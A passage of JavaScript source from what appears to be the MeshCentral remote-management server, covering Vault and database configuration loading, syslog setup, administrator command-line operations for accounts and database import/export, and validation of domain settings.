for (var i in lines) { var s = lines[i].split(': '); if ((s.length == 2) && (obj.args.npmtag == null) || (obj.args.npmtag == s[0])) { tags[s[0]] = s[1]; } }
} catch (e) { }
}
callback(tags);
});
} catch (ex) { callback({ current: getCurrentVerion() }, ex); } // If the system is running out of memory, an exception here can easily happen.
};
// Initiate server self-update
obj.performServerUpdate = function (version) {
if (obj.serverSelfWriteAllowed != true) return false;
if ((version == null) || (version == '') || (typeof version != 'string')) { console.log('Starting self upgrade...'); } else { console.log('Starting self upgrade to: ' + version); }
process.exit(200);
return true;
};
// Initiate server self-update
obj.performServerCertUpdate = function () { console.log('Updating server certificates...'); process.exit(200); };
// Start by loading configuration from Vault
obj.StartVault = function () {
// Check that the configuration can only be loaded from one place
if ((obj.args.vault != null) && (obj.args.loadconfigfromdb != null)) { console.log("Can't load configuration from both database and Vault."); process.exit(); return; }
// Fix arguments if needed
if (typeof obj.args.vault == 'string') {
obj.args.vault = { endpoint: obj.args.vault };
if (typeof obj.args.token == 'string') { obj.args.vault.token = obj.args.token; }
if (typeof obj.args.unsealkey == 'string') { obj.args.vault.unsealkey = obj.args.unsealkey; }
if (typeof obj.args.name == 'string') { obj.args.vault.name = obj.args.name; }
}
// Load configuration for HashiCorp's Vault if needed
if (obj.args.vault) {
if (obj.args.vault.endpoint == null) { console.log('Missing Vault endpoint.'); process.exit(); return; }
if (obj.args.vault.token == null) { console.log('Missing Vault token.'); process.exit(); return; }
if (obj.args.vault.unsealkey == null) { console.log('Missing Vault unsealkey.'); process.exit(); return; }
if (obj.args.vault.name == null) { obj.args.vault.name = 'meshcentral'; }
// Get new instance of the client
var vault = require("node-vault")({ endpoint: obj.args.vault.endpoint, token: obj.args.vault.token });
vault.unseal({ key: obj.args.vault.unsealkey })
.then(() => {
if (obj.args.vaultdeleteconfigfiles) {
vault.delete('secret/data/' + obj.args.vault.name)
.then(function (r) { console.log('Done.'); process.exit(); })
.catch(function (x) { console.log(x); process.exit(); });
} else if (obj.args.vaultpushconfigfiles) {
// Push configuration files into Vault
if ((obj.args.vaultpushconfigfiles == '*') || (obj.args.vaultpushconfigfiles === true)) { obj.args.vaultpushconfigfiles = obj.datapath; }
obj.fs.readdir(obj.args.vaultpushconfigfiles, function (err, files) {
if (err != null) { console.log('ERROR: Unable to read from folder ' + obj.args.vaultpushconfigfiles); process.exit(); return; }
var configFound = false;
for (var i in files) { if (files[i] == 'config.json') { configFound = true; } }
if (configFound == false) { console.log('ERROR: No config.json in folder ' + obj.args.vaultpushconfigfiles); process.exit(); return; }
var configFiles = {};
for (var i in files) {
const file = files[i];
if ((file == 'config.json') || file.endsWith('.key') || file.endsWith('.crt') || (file == 'terms.txt') || file.endsWith('.jpg') || file.endsWith('.png')) {
const path = obj.path.join(obj.args.vaultpushconfigfiles, files[i]), binary = Buffer.from(obj.fs.readFileSync(path, { encoding: 'binary' }), 'binary');
console.log('Pushing ' + file + ', ' + binary.length + ' bytes.');
if (file.endsWith('.json') || file.endsWith('.key') || file.endsWith('.crt')) { configFiles[file] = binary.toString(); } else { configFiles[file] = binary.toString('base64'); }
}
}
vault.write('secret/data/' + obj.args.vault.name, { "data": configFiles })
.then(function (r) { console.log('Done.'); process.exit(); })
.catch(function (x) { console.log(x); process.exit(); });
});
} else {
// Read configuration files from Vault
vault.read('secret/data/' + obj.args.vault.name)
.then(function (r) {
if ((r == null) || (r.data == null) || (r.data.data == null)) { console.log('Unable to read configuration from Vault.'); process.exit(); return; }
var configFiles = obj.configurationFiles = r.data.data;
// Decode Base64 when needed
for (var file in configFiles) { if (!file.endsWith('.json') && !file.endsWith('.key') && !file.endsWith('.crt')) { configFiles[file] = Buffer.from(configFiles[file], 'base64'); } }
// Save all of the files
if (obj.args.vaultpullconfigfiles) {
for (var i in configFiles) {
var fullFileName = obj.path.join(obj.args.vaultpullconfigfiles, i);
try { obj.fs.writeFileSync(fullFileName, configFiles[i]); } catch (ex) { console.log('Unable to write to ' + fullFileName); process.exit(); return; }
console.log('Pulling ' + i + ', ' + configFiles[i].length + ' bytes.');
}
console.log('Done.');
process.exit();
}
// Parse the new configuration file
var config2 = null;
try { config2 = JSON.parse(configFiles['config.json']); } catch (ex) { console.log('Error, unable to parse config.json from Vault.'); process.exit(); return; }
// Set the command line arguments to the config file if they are not present
if (!config2.settings) { config2.settings = {}; }
for (var i in args) { config2.settings[i] = args[i]; }
obj.args = args = config2.settings;
// Lower case all keys in the config file
try {
require('./common.js').objKeysToLower(config2, ['ldapoptions', 'defaultuserwebstate', 'forceduserwebstate']);
} catch (ex) {
console.log('CRITICAL ERROR: Unable to access the file \"./common.js\".\r\nCheck folder & file permissions.');
process.exit();
return;
}
// Grad some of the values from the original config.json file if present.
if ((config.settings.vault != null) && (config2.settings != null)) { config2.settings.vault = config.settings.vault; }
// We got a new config.json from the database, let's use it.
config = obj.config = config2;
obj.StartEx();
})
.catch(function (x) { console.log(x); process.exit(); });
}
}).catch(function (x) { console.log(x); process.exit(); });
return;
}
}
// Look for easy command line instructions and do them here.
obj.StartEx = function () {
var i;
//var wincmd = require('node-windows');
//wincmd.list(function (svc) { console.log(svc); }, true);
// Setup syslog support
if ((require('os').platform() != 'win32') && ((config.settings.syslog != null) || (config.settings.syslogjson != null) || (config.settings.syslogauth != null))) {
if (config.settings.syslog === true) { config.settings.syslog = 'meshcentral'; }
if (config.settings.syslogjson === true) { config.settings.syslogjson = 'meshcentral-json'; }
if (config.settings.syslogauth === true) { config.settings.syslogauth = 'meshcentral-auth'; }
if (typeof config.settings.syslog == 'string') {
obj.syslog = require('modern-syslog');
console.log('Starting ' + config.settings.syslog + ' syslog.');
obj.syslog.init(config.settings.syslog, obj.syslog.LOG_PID | obj.syslog.LOG_ODELAY, obj.syslog.LOG_LOCAL0);
obj.syslog.log(obj.syslog.LOG_INFO, "MeshCentral v" + getCurrentVerion() + " Server Start");
}
if (typeof config.settings.syslogjson == 'string') {
obj.syslogjson = require('modern-syslog');
console.log('Starting ' + config.settings.syslogjson + ' JSON syslog.');
obj.syslogjson.init(config.settings.syslogjson, obj.syslogjson.LOG_PID | obj.syslogjson.LOG_ODELAY, obj.syslogjson.LOG_LOCAL0);
obj.syslogjson.log(obj.syslogjson.LOG_INFO, "MeshCentral v" + getCurrentVerion() + " Server Start");
}
if (typeof config.settings.syslogauth == 'string') {
obj.authlog = true;
obj.syslogauth = require('modern-syslog');
console.log('Starting ' + config.settings.syslogauth + ' auth syslog.');
obj.syslogauth.init(config.settings.syslogauth, obj.syslogauth.LOG_PID | obj.syslogauth.LOG_ODELAY, obj.syslogauth.LOG_LOCAL0);
obj.syslogauth.log(obj.syslogauth.LOG_INFO, "MeshCentral v" + getCurrentVerion() + " Server Start");
}
}
// Check top level configuration for any unreconized values
if (config) { for (var i in config) { if ((typeof i == 'string') && (i.length > 0) && (i[0] != '_') && (['settings', 'domains', 'configfiles', 'smtp', 'letsencrypt', 'peers'].indexOf(i) == -1)) { addServerWarning('Unrecognized configuration option \"' + i + '\".'); } } }
if (typeof obj.args.userallowedip == 'string') { if (obj.args.userallowedip == '') { config.settings.userallowedip = obj.args.userallowedip = null; } else { config.settings.userallowedip = obj.args.userallowedip = obj.args.userallowedip.split(','); } }
if (typeof obj.args.userblockedip == 'string') { if (obj.args.userblockedip == '') { config.settings.userblockedip = obj.args.userblockedip = null; } else { config.settings.userblockedip = obj.args.userblockedip = obj.args.userblockedip.split(','); } }
if (typeof obj.args.agentallowedip == 'string') { if (obj.args.agentallowedip == '') { config.settings.agentallowedip = obj.args.agentallowedip = null; } else { config.settings.agentallowedip = obj.args.agentallowedip = obj.args.agentallowedip.split(','); } }
if (typeof obj.args.agentblockedip == 'string') { if (obj.args.agentblockedip == '') { config.settings.agentblockedip = obj.args.agentblockedip = null; } else { config.settings.agentblockedip = obj.args.agentblockedip = obj.args.agentblockedip.split(','); } }
if (typeof obj.args.swarmallowedip == 'string') { if (obj.args.swarmallowedip == '') { obj.args.swarmallowedip = null; } else { obj.args.swarmallowedip = obj.args.swarmallowedip.split(','); } }
if ((typeof obj.args.agentupdateblocksize == 'number') && (obj.args.agentupdateblocksize >= 1024) && (obj.args.agentupdateblocksize <= 65531)) { obj.agentUpdateBlockSize = obj.args.agentupdateblocksize; }
// Local console tracing
if (typeof obj.args.debug == 'string') { obj.debugSources = obj.args.debug.toLowerCase().split(','); }
else if (typeof obj.args.debug == 'object') { obj.debugSources = obj.args.debug; }
else if (obj.args.debug === true) { obj.debugSources = '*'; }
require('./db.js').CreateDB(obj,
function (db) {
obj.db = db;
obj.db.SetupDatabase(function (dbversion) {
// See if any database operations needs to be completed
if (obj.args.deletedomain) { obj.db.DeleteDomain(obj.args.deletedomain, function () { console.log('Deleted domain ' + obj.args.deletedomain + '.'); process.exit(); }); return; }
if (obj.args.deletedefaultdomain) { obj.db.DeleteDomain('', function () { console.log('Deleted default domain.'); process.exit(); }); return; }
if (obj.args.showall) { obj.db.GetAll(function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showusers) { obj.db.GetAllType('user', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.listuserids) { obj.db.GetAllType('user', function (err, docs) { for (var i in docs) { console.log(docs[i]._id); } process.exit(); }); return; }
if (obj.args.showusergroups) { obj.db.GetAllType('ugrp', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.shownodes) { obj.db.GetAllType('node', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showmeshes) { obj.db.GetAllType('mesh', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showevents) { obj.db.GetAllEvents(function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showsmbios) { obj.db.GetAllSMBIOS(function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.showpower) { obj.db.getAllPower(function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.clearpower) { obj.db.removeAllPowerEvents(function () { process.exit(); }); return; }
if (obj.args.showiplocations) { obj.db.GetAllType('iploc', function (err, docs) { console.log(docs); process.exit(); }); return; }
if (obj.args.logintoken) { obj.getLoginToken(obj.args.logintoken, function (r) { console.log(r); process.exit(); }); return; }
if (obj.args.logintokenkey) { obj.showLoginTokenKey(function (r) { console.log(r); process.exit(); }); return; }
if (obj.args.recordencryptionrecode) { obj.db.performRecordEncryptionRecode(function (count) { console.log('Re-encoded ' + count + ' record(s).'); process.exit(); }); return; }
if (obj.args.dbstats) { obj.db.getDbStats(function (stats) { console.log(stats); process.exit(); }); return; }
if (obj.args.createaccount) { // Create a new user account
if ((typeof obj.args.createaccount != 'string') || (obj.args.pass == null) || (obj.args.pass == '') || (obj.args.createaccount.indexOf(' ') >= 0)) { console.log("Usage: --createaccount [username] --pass [password] --domain (domain) --email (email)."); process.exit(); return; }
var userid = 'user/' + (obj.args.domain ? obj.args.domain : '') + '/' + obj.args.createaccount.toLowerCase(), domainid = obj.args.domain ? obj.args.domain : '';
obj.db.Get(userid, function (err, docs) {
if (err != null) { console.log("Database error: " + err); process.exit(); return; }
if ((docs != null) && (docs.length != 0)) { console.log('User already exists.'); process.exit(); return; }
if ((domainid != '') && ((config.domains == null) || (config.domains[domainid] == null))) { console.log("Invalid domain."); process.exit(); return; }
var user = { _id: userid, type: 'user', name: obj.args.createaccount, domain: domainid, creation: Math.floor(Date.now() / 1000), links: {} };
if (typeof obj.args.email == 'string') { user.email = obj.args.email; user.emailVerified = true; }
require('./pass').hash(obj.args.pass, function (err, salt, hash, tag) { if (err) { console.log("Unable create account password: " + err); process.exit(); return; } user.salt = salt; user.hash = hash; obj.db.Set(user, function () { console.log("Done."); process.exit(); return; }); }, 0);
});
return;
}
if (obj.args.resetaccount) { // Unlock a user account, set a new password and remove 2FA
if ((typeof obj.args.resetaccount != 'string') || (obj.args.pass == null) || (obj.args.pass == '') || (obj.args.resetaccount.indexOf(' ') >= 0)) { console.log("Usage: --resetaccount [username] --domain (domain) --pass [password]."); process.exit(); return; }
var userid = 'user/' + (obj.args.domain ? obj.args.domain : '') + '/' + obj.args.resetaccount.toLowerCase(), domainid = obj.args.domain ? obj.args.domain : '';
obj.db.Get(userid, function (err, docs) {
if (err != null) { console.log("Database error: " + err); process.exit(); return; }
if ((docs == null) || (docs.length == 0)) { console.log("Unknown username, usage: --resetaccount [username] --domain (domain) --pass [password]."); process.exit(); return; }
var user = docs[0]; if ((user.siteadmin) && (user.siteadmin != 0xFFFFFFFF) && (user.siteadmin & 32) != 0) { user.siteadmin -= 32; } // Unlock the account.
delete user.otpekey; delete user.otpsecret; delete user.otpkeys; delete user.otphkeys; // Disable 2FA
require('./pass').hash(obj.args.pass, user.salt, function (err, hash, tag) { if (err) { console.log("Unable to reset password: " + err); process.exit(); return; } user.hash = hash; obj.db.Set(user, function () { console.log("Done."); process.exit(); return; }); }, 0);
});
return;
}
if (obj.args.adminaccount) { // Set a user account to server administrator
if ((typeof obj.args.adminaccount != 'string') || (obj.args.adminaccount.indexOf(' ') >= 0)) { console.log("Invalid userid, usage: --adminaccount [username] --domain (domain)."); process.exit(); return; }
var userid = 'user/' + (obj.args.domain ? obj.args.domain : '') + '/' + obj.args.adminaccount.toLowerCase(), domainid = obj.args.domain ? obj.args.domain : '';
obj.db.Get(userid, function (err, docs) {
if (err != null) { console.log("Database error: " + err); process.exit(); return; }
if ((docs == null) || (docs.length == 0)) { console.log("Unknown username, usage: --adminaccount [username] --domain (domain)."); process.exit(); return; }
docs[0].siteadmin = 0xFFFFFFFF; // Set user as site administrator
obj.db.Set(docs[0], function () { console.log("Done."); process.exit(); return; });
});
return;
}
// Show a list of all configuration files in the database
if (obj.args.dblistconfigfiles) {
obj.db.GetAllType('cfile', function (err, docs) { if (err == null) { if (docs.length == 0) { console.log("No files found."); } else { for (var i in docs) { console.log(docs[i]._id.split('/')[1] + ', ' + Buffer.from(docs[i].data, 'base64').length + ' bytes.'); } } } else { console.log('Unable to read from database.'); } process.exit(); }); return;
}
// Display the content of a configuration file in the database
if (obj.args.dbshowconfigfile) {
if (typeof obj.args.configkey != 'string') { console.log("Error, --configkey is required."); process.exit(); return; }
obj.db.getConfigFile(obj.args.dbshowconfigfile, function (err, docs) {
if (err == null) {
if (docs.length == 0) { console.log("File not found."); } else {
var data = obj.db.decryptData(obj.args.configkey, docs[0].data);
if (data == null) { console.log("Invalid config key."); } else { console.log(data); }
}
} else { console.log("Unable to read from database."); }
process.exit();
}); return;
}
// Delete all configuration files from database
if (obj.args.dbdeleteconfigfiles) {
console.log("Deleting all configuration files from the database..."); obj.db.RemoveAllOfType('cfile', function () { console.log('Done.'); process.exit(); });
}
// Push all relevent files from meshcentral-data into the database
if (obj.args.dbpushconfigfiles) {
if (typeof obj.args.configkey != 'string') { console.log("Error, --configkey is required."); process.exit(); return; }
if ((obj.args.dbpushconfigfiles !== true) && (typeof obj.args.dbpushconfigfiles != 'string')) {
console.log("Usage: --dbpulldatafiles (path) This will import files from folder into the database");
console.log(" --dbpulldatafiles This will import files from meshcentral-data into the db.");
process.exit();
} else {
if ((obj.args.dbpushconfigfiles == '*') || (obj.args.dbpushconfigfiles === true)) { obj.args.dbpushconfigfiles = obj.datapath; }
obj.fs.readdir(obj.args.dbpushconfigfiles, function (err, files) {
if (err != null) { console.log('ERROR: Unable to read from folder ' + obj.args.dbpushconfigfiles); process.exit(); return; }
var configFound = false;
for (var i in files) { if (files[i] == 'config.json') { configFound = true; } }
if (configFound == false) { console.log('ERROR: No config.json in folder ' + obj.args.dbpushconfigfiles); process.exit(); return; }
obj.db.RemoveAllOfType('cfile', function () {
obj.fs.readdir(obj.args.dbpushconfigfiles, function (err, files) {
var lockCount = 1
for (var i in files) {
const file = files[i];
if ((file == 'config.json') || file.endsWith('.key') || file.endsWith('.crt') || (file == 'terms.txt') || file.endsWith('.jpg') || file.endsWith('.png')) {
const path = obj.path.join(obj.args.dbpushconfigfiles, files[i]), binary = Buffer.from(obj.fs.readFileSync(path, { encoding: 'binary' }), 'binary');
console.log('Pushing ' + file + ', ' + binary.length + ' bytes.');
lockCount++;
obj.db.setConfigFile(file, obj.db.encryptData(obj.args.configkey, binary), function () { if ((--lockCount) == 0) { console.log('Done.'); process.exit(); } });
}
}
if (--lockCount == 0) { process.exit(); }
});
});
});
}
return;
}
// Pull all database files into meshcentral-data
if (obj.args.dbpullconfigfiles) {
if (typeof obj.args.configkey != 'string') { console.log("Error, --configkey is required."); process.exit(); return; }
if (typeof obj.args.dbpullconfigfiles != 'string') {
console.log("Usage: --dbpulldatafiles (path)");
process.exit();
} else {
obj.db.GetAllType('cfile', function (err, docs) {
if (err == null) {
if (docs.length == 0) {
console.log("File not found.");
} else {
for (var i in docs) {
const file = docs[i]._id.split('/')[1], binary = obj.db.decryptData(obj.args.configkey, docs[i].data);
if (binary == null) {
console.log("Invalid config key.");
} else {
var fullFileName = obj.path.join(obj.args.dbpullconfigfiles, file);
try { obj.fs.writeFileSync(fullFileName, binary); } catch (ex) { console.log('Unable to write to ' + fullFileName); process.exit(); return; }
console.log('Pulling ' + file + ', ' + binary.length + ' bytes.');
}
}
}
} else {
console.log("Unable to read from database.");
}
process.exit();
});
}
return;
}
if (obj.args.dbexport) {
// Export the entire database to a JSON file
if (obj.args.dbexport == true) { obj.args.dbexport = obj.getConfigFilePath('meshcentral.db.json'); }
obj.db.GetAll(function (err, docs) {
obj.fs.writeFileSync(obj.args.dbexport, JSON.stringify(docs));
console.log('Exported ' + docs.length + ' objects(s) to ' + obj.args.dbexport + '.'); process.exit();
});
return;
}
if (obj.args.dbexportmin) {
// Export a minimal database to a JSON file. Export only users, meshes and nodes.
// This is a useful command to look at the database.
if (obj.args.dbexportmin == true) { obj.args.dbexportmin = obj.getConfigFilePath('meshcentral.db.json'); }
obj.db.GetAllType({ $in: ['user', 'node', 'mesh'] }, function (err, docs) {
obj.fs.writeFileSync(obj.args.dbexportmin, JSON.stringify(docs));
console.log('Exported ' + docs.length + ' objects(s) to ' + obj.args.dbexportmin + '.'); process.exit();
});
return;
}
if (obj.args.dbimport) {
// Import the entire database from a JSON file
if (obj.args.dbimport == true) { obj.args.dbimport = obj.getConfigFilePath('meshcentral.db.json'); }
var json = null, json2 = "", badCharCount = 0;
try { json = obj.fs.readFileSync(obj.args.dbimport, { encoding: 'utf8' }); } catch (e) { console.log('Invalid JSON file: ' + obj.args.dbimport + ': ' + e); process.exit(); }
for (i = 0; i < json.length; i++) { if (json.charCodeAt(i) >= 32) { json2 += json[i]; } else { var tt = json.charCodeAt(i); if (tt != 10 && tt != 13) { badCharCount++; } } } // Remove all bad chars
if (badCharCount > 0) { console.log(badCharCount + ' invalid character(s) where removed.'); }
try { json = JSON.parse(json2); } catch (e) { console.log('Invalid JSON format: ' + obj.args.dbimport + ': ' + e); process.exit(); }
if ((json == null) || (typeof json.length != 'number') || (json.length < 1)) { console.log('Invalid JSON format: ' + obj.args.dbimport + '.'); }
for (i in json) { if ((json[i].type == "mesh") && (json[i].links != null)) { for (var j in json[i].links) { var esc = obj.common.escapeFieldName(j); if (esc !== j) { json[i].links[esc] = json[i].links[j]; delete json[i].links[j]; } } } } // Escape MongoDB invalid field chars
//for (i in json) { if ((json[i].type == "node") && (json[i].host != null)) { json[i].rname = json[i].host; delete json[i].host; } } // DEBUG: Change host to rname
setTimeout(function () { // If the Mongo database is being created for the first time, there is a race condition here. This will get around it.
obj.db.RemoveAll(function () {
obj.db.InsertMany(json, function (err) {
if (err != null) { console.log(err); } else { console.log('Imported ' + json.length + ' objects(s) from ' + obj.args.dbimport + '.'); } process.exit();
});
});
}, 100);
return;
}
/*
if (obj.args.dbimport) {
// Import the entire database from a very large JSON file
obj.db.RemoveAll(function () {
if (obj.args.dbimport == true) { obj.args.dbimport = obj.getConfigFilePath('meshcentral.db.json'); }
var json = null, json2 = "", badCharCount = 0;
const StreamArray = require('stream-json/streamers/StreamArray');
const jsonStream = StreamArray.withParser();
jsonStream.on('data', function (data) { obj.db.Set(data.value); });
jsonStream.on('end', () => { console.log('Done.'); process.exit(); });
obj.fs.createReadStream(obj.args.dbimport).pipe(jsonStream.input);
});
return;
}
*/
if (obj.args.dbmerge) {
// Import the entire database from a JSON file
if (obj.args.dbmerge == true) { obj.args.dbmerge = obj.getConfigFilePath('meshcentral.db.json'); }
var json = null, json2 = "", badCharCount = 0;
try { json = obj.fs.readFileSync(obj.args.dbmerge, { encoding: 'utf8' }); } catch (e) { console.log('Invalid JSON file: ' + obj.args.dbmerge + ': ' + e); process.exit(); }
for (i = 0; i < json.length; i++) { if (json.charCodeAt(i) >= 32) { json2 += json[i]; } else { var tt = json.charCodeAt(i); if (tt != 10 && tt != 13) { badCharCount++; } } } // Remove all bad chars
if (badCharCount > 0) { console.log(badCharCount + ' invalid character(s) where removed.'); }
try { json = JSON.parse(json2); } catch (e) { console.log('Invalid JSON format: ' + obj.args.dbmerge + ': ' + e); process.exit(); }
if ((json == null) || (typeof json.length != 'number') || (json.length < 1)) { console.log('Invalid JSON format: ' + obj.args.dbimport + '.'); }
// Get all users from current database
obj.db.GetAllType('user', function (err, docs) {
var users = {}, usersCount = 0;
for (var i in docs) { users[docs[i]._id] = docs[i]; usersCount++; }
// Fetch all meshes from the database
obj.db.GetAllType('mesh', function (err, docs) {
obj.common.unEscapeAllLinksFieldName(docs);
var meshes = {}, meshesCount = 0;
for (var i in docs) { meshes[docs[i]._id] = docs[i]; meshesCount++; }
console.log('Loaded ' + usersCount + ' users and ' + meshesCount + ' meshes.');
// Look at each object in the import file
var objectToAdd = [];
for (var i in json) {
var newobj = json[i];
if (newobj.type == 'user') {
// Check if the user already exists
var existingUser = users[newobj._id];
if (existingUser) {
// Merge the links
if (typeof newobj.links == 'object') {
for (var j in newobj.links) {
if ((existingUser.links == null) || (existingUser.links[j] == null)) {
if (existingUser.links == null) { existingUser.links = {}; }
existingUser.links[j] = newobj.links[j];
}
}
}
if (existingUser.name == 'admin') { existingUser.links = {}; }
objectToAdd.push(existingUser); // Add this user
} else {
objectToAdd.push(newobj); // Add this user
}
} else if (newobj.type == 'mesh') {
// Add this object
objectToAdd.push(newobj);
} // Don't add nodes.
}
console.log('Importing ' + objectToAdd.length + ' object(s)...');
var pendingCalls = 1;
for (var i in objectToAdd) {
pendingCalls++;
obj.db.Set(objectToAdd[i], function (err) { if (err != null) { console.log(err); } else { if (--pendingCalls == 0) { process.exit(); } } });
}
if (--pendingCalls == 0) { process.exit(); }
});
});
return;
}
// Load configuration for database if needed
if (obj.args.loadconfigfromdb) {
var key = null;
if (typeof obj.args.configkey == 'string') { key = obj.args.configkey; }
else if (typeof obj.args.loadconfigfromdb == 'string') { key = obj.args.loadconfigfromdb; }
if (key == null) { console.log("Error, --configkey is required."); process.exit(); return; }
obj.db.getAllConfigFiles(key, function (configFiles) {
if (configFiles == null) { console.log("Error, no configuration files found or invalid configkey."); process.exit(); return; }
if (!configFiles['config.json']) { console.log("Error, could not file config.json from database."); process.exit(); return; }
obj.configurationFiles = configFiles;
// Parse the new configuration file
var config2 = null;
try { config2 = JSON.parse(configFiles['config.json']); } catch (ex) { console.log('Error, unable to parse config.json from database.'); process.exit(); return; }
// Set the command line arguments to the config file if they are not present
if (!config2.settings) { config2.settings = {}; }
for (i in args) { config2.settings[i] = args[i]; }
// Lower case all keys in the config file
try {
require('./common.js').objKeysToLower(config2, ['ldapoptions', 'defaultuserwebstate', 'forceduserwebstate']);
} catch (ex) {
console.log("CRITICAL ERROR: Unable to access the file \"./common.js\".\r\nCheck folder & file permissions.");
process.exit();
return;
}
// Grad some of the values from the original config.json file if present.
config2['mysql'] = config['mysql'];
config2['mariadb'] = config['mariadb'];
config2['mongodb'] = config['mongodb'];
config2['mongodbcol'] = config['mongodbcol'];
config2['dbencryptkey'] = config['dbencryptkey'];
// We got a new config.json from the database, let's use it.
config = obj.config = config2;
obj.StartEx1b();
});
} else {
config = obj.config = getConfig(obj.args.vault == null);
obj.StartEx1b();
}
});
}
);
};
// Time to start the server of real.
obj.StartEx1b = function () {
var i;
// Linux format /var/log/auth.log
if (obj.config.settings.authlog != null) {
obj.fs.open(obj.config.settings.authlog, 'a', function (err, fd) {
if (err == null) { obj.authlogfile = fd; obj.authlog = true; } else { console.log('ERROR: Unable to open: ' + obj.config.settings.authlog); }
})
}
// Check if self update is allowed. If running as a Windows service, self-update is not possible.
if (obj.fs.existsSync(obj.path.join(__dirname, 'daemon'))) { obj.serverSelfWriteAllowed = false; }
// If we are targetting a specific version, update now.
if ((obj.serverSelfWriteAllowed == true) && (typeof obj.args.selfupdate == 'string')) {
obj.args.selfupdate = obj.args.selfupdate.toLowerCase();
if (getCurrentVerion() !== obj.args.selfupdate) { obj.performServerUpdate(); return; } // We are targetting a specific version, run self update now.
}
// Write the server state
obj.updateServerState('state', 'starting');
if (process.pid) { obj.updateServerState('server-pid', process.pid); }
if (process.ppid) { obj.updateServerState('server-parent-pid', process.ppid); }
// Start memory tracking if requested
if (typeof obj.args.memorytracking == 'number') {
var info = process.memoryUsage(), txt = [];
info.time = Date.now();
for (var i in info) { txt.push(i); }
obj.fs.appendFile(obj.getConfigFilePath('memorytracking.csv'), txt.join(',') + '\r\n', function (err) { });
setInterval(function () {
var info = process.memoryUsage(), txt = [];
info.time = Date.now();
for (var i in info) { txt.push(info[i]); }
obj.fs.appendFile(obj.getConfigFilePath('memorytracking.csv'), txt.join(',') + '\r\n', function (err) { });
}, (obj.args.memorytracking * 1000));
}
// Read environment variables. For a subset of arguments, we allow them to be read from environment variables.
var xenv = ['user', 'port', 'mpsport', 'mpsaliasport', 'redirport', 'rediraliasport', 'exactport', 'debug'];
for (i in xenv) { if ((obj.args[xenv[i]] == null) && (process.env['mesh' + xenv[i]])) { obj.args[xenv[i]] = obj.common.toNumber(process.env['mesh' + xenv[i]]); } }
// Validate the domains, this is used for multi-hosting
if (obj.config.domains == null) { obj.config.domains = {}; }
if (obj.config.domains[''] == null) { obj.config.domains[''] = {}; }
if (obj.config.domains[''].dns != null) { console.log("ERROR: Default domain can't have a DNS name."); return; }
var xdomains = {}; for (i in obj.config.domains) { xdomains[i.toLowerCase()] = obj.config.domains[i]; } obj.config.domains = xdomains;
var bannedDomains = ['public', 'private', 'images', 'scripts', 'styles', 'views']; // List of banned domains
for (i in obj.config.domains) { for (var j in bannedDomains) { if (i == bannedDomains[j]) { console.log("ERROR: Domain '" + i + "' is not allowed domain name in config.json."); return; } } }
for (i in obj.config.domains) {
if (typeof obj.config.domains[i] != 'object') { console.log("ERROR: Invalid domain configuration in config.json."); process.exit(); return; }
if ((i.length > 0) && (i[0] == '_')) { delete obj.config.domains[i]; continue; } // Remove any domains with names that start with _
if (typeof config.domains[i].auth == 'string') { config.domains[i].auth = config.domains[i].auth.toLowerCase(); }
if (obj.config.domains[i].limits == null) { obj.config.domains[i].limits = {}; }
if (obj.config.domains[i].dns == null) { obj.config.domains[i].url = (i == '') ? '/' : ('/' + i + '/'); } else { obj.config.domains[i].url = '/'; }
obj.config.domains[i].id = i;
if (typeof obj.config.domains[i].loginkey == 'string') { obj.config.domains[i].loginkey = [obj.config.domains[i].loginkey]; }
if (typeof obj.config.domains[i].userallowedip == 'string') { if (obj.config.domains[i].userallowedip == '') { obj.config.domains[i].userallowedip = null; } else { obj.config.domains[i].userallowedip = obj.config.domains[i].userallowedip.split(','); } }
if (typeof obj.config.domains[i].userblockedip == 'string') { if (obj.config.domains[i].userblockedip == '') { obj.config.domains[i].userblockedip = null; } else { obj.config.domains[i].userblockedip = obj.config.domains[i].userblockedip.split(','); } }
if (typeof obj.config.domains[i].agentallowedip == 'string') { if (obj.config.domains[i].agentallowedip == '') { obj.config.domains[i].agentallowedip = null; } else { obj.config.domains[i].agentallowedip = obj.config.domains[i].agentallowedip.split(','); } }
if (typeof obj.config.domains[i].agentblockedip == 'string') { if (obj.config.domains[i].agentblockedip == '') { obj.config.domains[i].agentblockedip = null; } else { obj.config.domains[i].agentblockedip = obj.config.domains[i].agentblockedip.split(','); } }
if ((obj.config.domains[i].passwordrequirements != null) && (typeof obj.config.domains[i].passwordrequirements == 'object')) {
if (typeof obj.config.domains[i].passwordrequirements.skip2factor == 'string') {
obj.config.domains[i].passwordrequirements.skip2factor = obj.config.domains[i].passwordrequirements.skip2factor.split(',');
} else {
delete obj.config.domains[i].passwordrequirements.skip2factor;
}
}
if ((obj.config.domains[i].auth == 'ldap') && (typeof obj.config.domains[i].ldapoptions != 'object')) {
if (i == '') { console.log("ERROR: Default domain is LDAP, but is missing LDAPOptions."); } else { console.log("ERROR: Domain '" + i + "' is LDAP, but is missing LDAPOptions."); }
process.exit();
return;
}
if ((obj.config.domains[i].auth == 'ldap') || (obj.config.domains[i].auth == 'sspi')) { obj.config.domains[i].newaccounts = 0; } // No new accounts allowed in SSPI/LDAP authentication modes.
// Convert newAccountsRights from a array of strings to flags number.
if (obj.config.domains[i].newaccountsrights && Array.isArray(obj.config.domains[i].newaccountsrights)) {
var newAccRights = 0;
for (var j in obj.config.domains[i].newaccountsrights) {
var r = obj.config.domains[i].newaccountsrights[j].toLowerCase();
if (r == 'fulladmin') { newAccRights = 4294967295; } // 0xFFFFFFFF
if (r == 'serverbackup') { newAccRights |= 1; }
if (r == 'manageusers') { newAccRights |= 2; }
if (r == 'serverrestore') { newAccRights |= 4; }
if (r == 'fileaccess') { newAccRights |= 8; }
if (r == 'serverupdate') { newAccRights |= 16; }
if (r == 'locked') { newAccRights |= 32; }
if (r == 'nonewgroups') { newAccRights |= 64; }
if (r == 'notools') { newAccRights |= 128; }
}
obj.config.domains[i].newaccountsrights = newAccRights;
}
